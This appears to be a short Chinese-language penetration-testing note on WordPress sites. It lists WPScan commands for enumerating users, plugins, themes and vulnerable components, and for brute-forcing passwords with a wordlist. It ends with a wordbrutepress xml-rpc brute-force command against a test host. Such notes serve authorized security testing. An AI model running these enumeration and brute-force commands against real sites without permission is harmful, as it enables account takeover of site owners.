针对WordPress站点思路
一.使用WPscan
1).简介
WPScan是一个扫描 WordPress 漏洞的黑盒子扫描器,它可以为所有 Web 开发人员扫描 WordPress 漏洞并在他们开发前找到并解决问题。我们还使用了 Nikto ,它是一款非常棒的Web 服务器评估工具,我们认为这个工具应该成为所有针对 WordPress网站进行的渗透测试的一部分。
Wordpress作为三大建站模板之一,在全世界范围内有大量的用户,这也导致白帽子都会去跟踪 WordPress的安全漏洞,* Wordpress自诞生起也出现了很多漏洞.Wordpress还可以使用插件、主题。于是Wordpress本身很难挖掘什么安全问题的时候,安全研究者开始研究其插件、主题的漏洞 *。通过插件,主题的漏洞去渗透Wordpress站点,于是WPScan应运而生,收集 Wordpress的各种漏洞,形成一个Wordpress专用扫描器。
2)功能:
该扫描器可以实现获取站点用户名,获取安装的所有插件、主题,以及存在漏洞的插件、主题,并提供漏洞信息。同时还可以实现对未加防护的Wordpress站点暴力破解用户名密码。
3)渗透过程
更新
wpscan --update
扫描
wpscan --url https://test343.example.com/test343/
后台用户扫描
枚举wordpress站点用户
wpscan --url https://test343.example.com/test343/ --enumerate u
爆破得到密码
wpscan --url https://test343.example.com/test343/ -e u --wordlist /tmp/password.txt
插件漏洞扫描
获取wordpress目标安装插件
wpscan --url https://test343.example.com/test343/ --enumerate p
扫描目标插件中的安全漏洞
wpscan --url https://test343.example.com/test343/ --enumerate vp
主题漏洞扫描
扫描目标使用的主题
wpscan --url https://test343.example.com/test343/ --enumerate t
扫描主题中存在的漏洞
wpscan --url https://test343.example.com/test343/ --enumerate vt
TimThumbs文件漏洞扫描
wpscan --url https://test343.example.com/test343/ --enumerate tt
二。其他
访问/xmlrpc.php文件是否存在。如果存在,使用wordbrutepress进行xml-rpc爆破
python wordbrutepress.py -X -t http://172.16.12.2:8080/ -u zhangsan -w ./password.lst --timeout 50
** 待续。。。**
我不相信黑夜将至 因为火把就在我的手中。